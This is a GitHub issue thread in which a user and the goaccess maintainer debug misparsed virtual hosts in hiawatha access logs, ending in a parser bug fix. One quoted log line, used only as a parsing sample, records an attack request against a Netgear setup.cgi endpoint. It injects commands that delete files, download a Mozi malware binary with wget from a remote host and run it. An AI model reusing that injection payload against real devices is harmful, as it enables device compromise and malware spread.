### ISSUE TITLE
Debugging log parsing issues

### ISSUE THREAD

**Issue by rouilj** [allinurl/goaccess#2011]
I use hiawatha as my web server. The relevant options are:

```
 --log-format '%h|%d %t|%s|%b|%m %U %H|%R|%u|Host: %v|'
 --time-format "%T %z"
 --date-format "%a %d %b %Y"
```
There are additional fields at the end of the log lines, but I don't need them parsed at the moment.

I get some odd parsing of fields. E.G.

 > 9 - Virtual Hosts                                              Total: 14/14
```
 Hits     h% Vis.     v% Tx. Amount Data
 ---- ------ ---- ------ ---------- ----
 3286 98.95%   93 95.88%  46.84 MiB me.example2.com
   11  0.33%    0  0.00%   9.52 KiB 109.7.24.95
   10  0.30%    0  0.00%   9.35 KiB 109.7.24.95:80
    3  0.09%    0  0.00%   2.80 KiB HTTP/1.1
    2  0.06%    1  1.03%   2.79 KiB 109.7.24.95:8080
    1  0.03%    0  0.00%  957.0   B +xml, application/atom+xml, text/xml, text/r
    1  0.03%    0  0.00%  957.0   B 127.0.0.1:80
    1  0.03%    0  0.00%  957.0   B table=2 HTTP/1.1
    1  0.03%    1  1.03%  365.0   B : text/html,application/xhtml+xml,applicatio
    1  0.03%    1  1.03%   1.84 KiB printable=2 HTTP/1.1
    1  0.03%    0  0.00%  957.0   B tion: close
    1  0.03%    0  0.00%  957.0   B 109.7.24.95:443
    1  0.03%    0  0.00%  957.0   B -Encoding: identity
    1  0.03%    1  1.03%  201.0   B me.example.com
```
For the '-Encoding: identity' case, I have tracked it down to `|%u|Host: %v|`. The Host: field is really part of the listing of all
the request parameters in alphabetic order.

In regexp terms, I would want something like: `|%u|.*|?Host: %v|` to allow parsing of:

```
69.24.219.126|Tue 26 Jan 2021 10:33:43 -0500|403|957|GET / HTTP/1.1||Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36|Accept-Encoding: identity|Host: 109.7.24.95|Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
```
so the %u ends with | and host starts with |.

Any ideas on how to make this work?

Also is there any option to show the log lines that are producing the other weird parsing issues like: "tion: close" and "HTTP/1.1" entries?

Thanks.

-- rouilj

**Comment by allinurl** [comment]
Please try this, let me know if that works for you:

    goaccess oneliner.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^|%^: %v|%^: %M,%^' --date-format='%a %d %b %Y' --time-format='%T %z'

**Comment by rouilj** [comment]
Sorry to report the new log line format doesn't work. It does not report any of the valid hostnames: 109.7.24.95 or me.*
from my initial report. 

Note that the position of the Host header in the log line is not in a fixed position. The position changes
depending on what headers the client sends.

I am now using:
```
tail access.log |  sed -E -e 's/^(([^|]*\|){7})(([^|]*\|)*)(Host: [^|]*\|?)/z\1\5\3/' | goaccess  \
   --log-format '%h|%d %t|%s|%b|%m %U %H|%R|%u|Host: %v|'  \
   --time-format "%T %z"  --date-format "%a %d %b %Y" -f -
```
with gnu sed. This normalizes the lines to force the host header (if present) into the position after the useragent (%u).

Even with this processing I see issues. For example I see a Virtual Host of HTTP/1.1 for this sequence of log lines:
```
15.11.11.11|Tue 26 Jan 2021 01:54:41 -0500|200|13871|GET /demo/msg33026?%40printable=1 HTTP/1.1||Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)|Host: me.example2.com|Accept: text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml|Accept-Encoding: gzip,deflate|Connection: close
47.16.20.124|Tue 26 Jan 2021 01:54:59 -0500|404|957|GET /manager/html/ HTTP/1.0||
```
generated by the second log line. The first line generates a valid virtual host of me.example2.com.

If only the second line is submitted to goaccess (and is followed by an empty line) no virtual host entry is shown
which is correct.

So somehow the contents of the first log line (HTTP/1.1) is contaminating the second log line's parsing.

Also these log lines (they may be broken by the editor):
```
105.11.71.2|Tue 26 Jan 2021 01:48:54 -0500|200|13105|GET /demo/msg7247?%40printable=1 HTTP/1.1||Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)|Host: me.example2.com|Accept: text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml|Accept-Encoding: gzip,deflate|Connection: close
202.164.139.219|Tue 26 Jan 2021 01:49:23 -0500|403|957|GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.164.139.219:47109/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0||
```
reports a  virtual host of `+xml, application/atom+xml, text/xml, text/`. That virtual host string produced by the second log line is text in the previous log line.

Not sure if this helps but....

Is there some way to drill down from the virtual host display to the list of log lines that produced the virtual host entry?
I have been binary searching the log file and dumping it into goaccess to find the problem log entries, but this is tedious at best.

-- rouilj

**Comment by allinurl** [comment]
Sorry to hear that, for the line you posted above, it does work for me. Would you be able to post/attach a good chunk of lines from your access log as they show up in the log? Feel free to replace the ips as needed. Thanks

**Comment by rouilj** [comment]
Hmm, so if you create a file with the four lines above and feed it to goaccess, than look at screen 9, you don't see `HTTP/1.1` and `+xml, application/atom+xml, text/xml, text/` listed?

If I paste all 4 lines into a file and run it against goaccess, I see:

```
 > 9 - Virtual Hosts                                                Total: 3/3

 Hits     h% Vis.      v% Tx. Amount Data
 ---- ------ ---- ------- ---------- ----
    2 50.00%    2 100.00%  26.34 KiB me.example2.com
    1 25.00%    0   0.00%  957.0   B TTP/1.1
    1 25.00%    0   0.00%  957.0   B ication/atom+xml, text/xml, text/rss+xml, a
```
so not exactly what I reported but still wrong.

I'll get you some logs. Question do the IP addresses have to be valid? E.G. would 324.125.23.941 be acceptable?

**Comment by allinurl** [comment]
Yes, the IP has to be valid, but they can be private IPs. 

Since there's no consistency in the log format across all lines, i.e., some fields are available in some lines, some are not, then you won't be able fully parse it. The closest from those 4-5 lines would be:

    goaccess access.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^' --date-format='%a %d %b %Y' --time-format='%T %z'

**Comment by rouilj** [comment]
In message <allinurl/goaccess/issues/2011/769479649@github.com>,
"Gerardo O." writes:
>Yes, the IP has to be valid, but they can be private IPs.

Ok.


>Since there's no consistency in the log format across all lines,
> i.e., some fields are available in some lines, some are not, then you
> won't be able fully parse it. The closest from those 4-5 lines would
> be:
>
>    goaccess access.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^' --date-format='%a %d %b %Y' --time-format='%T %z'

I can understand if a dummy value (I think '-' is what you use for
missing data) is used, but where there are valid values I would expect
the progam to extract them correctly.

E.G.

202.164.139.219|Tue 26 Jan 2021 01:49:23 -0500|403|957|GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.164.139.219:47109/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0||

does have a valid method, url and protocol but is missing the
Host/virtual host field. So why is part of the protocol version
showing up as a virtual host? This looks like a bug of some sort.

--
				-- rouilj

**Comment by allinurl** [comment]
Can I ask which log-format are you using? On that last specific line you posted, using the log-format I posted above, won't report any virtual host - here's a screenshot of those four lines combined:

    goaccess access.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^:%v|%^' --date-format='%a %d %b %Y' --time-format='%T %z'

![2021-01-28-200942_666x1046_scrot](https://user-images.githubusercontent.com/5005367/106222276-cd30f280-61a4-11eb-92bd-82c45fe820ab.png)

**Comment by rouilj** [comment]
Hi Gerardo:

In message <allinurl/goaccess/issues/2011/769526618@github.com>,
"Gerardo O." writes:
> Can I ask which log-format are you using? On that last specific line
> you posted, using the log-format I posted above, won't report any
> virtual host - here's a screenshot of those four lines combined:
>
>    goaccess access.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^:%v|%^' --date-format='%a %d %b %Y' --time-format='%T %z'

I am using my original log-format line. I send the data into:

./goaccess --log-format '%h|%d %t|%s|%b|%m %U %H|%R|%u|Host: %v|' --time-format "%T %z" --date-format "%a %d %b %Y" --color-scheme=2 -f -

--
				-- rouilj

**Comment by rouilj** [comment]
Attaching a sanitized log from today.

[access.sanitized.log](https://github.com/allinurl/goaccess/files/5891589/access.sanitized.log)

When I send this to goaccess using the command line in https://github.com/allinurl/goaccess/issues/2011#issuecomment-769555021, I see the following virtual hosts:

```
 3473 98.81%  122 99.19%  42.05 MiB me.example.com
   19  0.54%    0  0.00%  17.76 KiB 172.16.1.2
   13  0.37%    0  0.00%  12.15 KiB 172.16.1.2:80
    2  0.06%    0  0.00%   1.87 KiB 172.16.1.2:443
    1  0.03%    0  0.00%  957.0   B me.example2.com
    1  0.03%    0  0.00%  957.0   B /chat-poll?name=67 HTTP/1.1
    1  0.03%    0  0.00%  957.0   B ll?name=67 HTTP/1.1
    1  0.03%    0  0.00%  957.0   B oll?name=67 HTTP/1.1
    1  0.03%    0  0.00%  957.0   B esize=50&%40printable=1&%40startwith=0&show_
    1  0.03%    0  0.00%  957.0   B &%40printable=1&%40startwith=0&show_all_hist
    1  0.03%    1  0.81%  193.0   B min/chat-poll?name=67 HTTP/1.1
    1  0.03%    0  0.00%  175.0   B =2&%40template=item&show_all_history=yes HTT
```
where the first 5 entries (down to me.example2.com) are valid virtual host names. 172.16.1.2 is the obscured
external host ip address while 192.168.1.2 is the obscured internal ip address of the host.

**Comment by allinurl** [comment]
@rouilj the log format I posted appears to work for me, seems like you are using a different format, please try this format and let me know how it goes.

    goaccess access.sanitized.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^:%v|%^' --date-format='%a %d %b %Y' --time-format='%T %z'

Outputs:

```
 > 9 - Virtual Hosts                                                                                                                                                                                                                                                                                               Total: 5/5

 Hits     h% Vis.     v% Tx. Amount Data
 ---- ------ ---- ------ ---------- ----
 3473 98.81%  122 99.19%  42.05 MiB me.example.com
   19  0.54%    0  0.00%  17.76 KiB 172.16.1.2
   13  0.37%    0  0.00%  12.15 KiB 172.16.1.2:80
    2  0.06%    0  0.00%   1.87 KiB 172.16.1.2:443
    1  0.03%    0  0.00%  957.0   B me.example2.com

```

**Comment by rouilj** [comment]
That seems to work better. Also it catches the case where 'host' is sent rather than 'Host'. Thanks.

**Comment by allinurl** [comment]
@rouilj I was playing with your format and I did see those odd outputs, so decided to look further and indeed was a bug. 

I do apologize to hurry on my response. This has been fixed upstream. Please feel free to build from [**development**](https://github.com/allinurl/goaccess#build-from-github-development) and let me know if that solves the issue on your end. It should be able now to get correctly those extra fields at the end of some lines. This will be pushed out in the upcoming release.

Thank you again for reporting this!

    ./goaccess ../logs/access.sanitized.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|%^: %v|%^: %M,%^' --date-format='%a %d %b %Y' --time-format='%T %z'

OR your format:

    ./goaccess ../logs/access.sanitized.log --log-format='%h|%d %t|%s|%b|%r|%R|%u|Host: %v|%^: %M,%^' --date-format='%a %d %b %Y' --time-format='%T %z'
